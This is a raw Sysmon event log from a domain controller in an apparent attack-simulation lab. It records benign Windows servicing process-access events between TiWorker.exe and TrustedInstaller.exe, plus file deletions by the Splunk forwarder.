12:02:26.072{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.072{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.072{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.072{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.072{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.072{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.057{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.057{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000006123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.057{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFB4DBA0DD5A7C2D364CF1F765C226FF,SHA256=61F3726907CB912EF1FE6224965FBA3E597D7331F9D7D6137B52180E5A4AFF4F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.041{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.041{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.041{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.041{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.041{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.041{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.025{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000006115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.025{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7DA4BCA9C5A66EF83D9DF9C03420209B,SHA256=D8134EBDDC65F31B42CCA335F4BA74F4BFC97D38985360D5BCD7AB811D137851,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000006114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.025{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=1C0638A4A3BCFE49C85EA5036902A7C1,SHA256=D034A7565BD64359A97C1FF36D88848F84FB03ADF7AD13FA7251F8B73D984979,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.010{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.010{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1e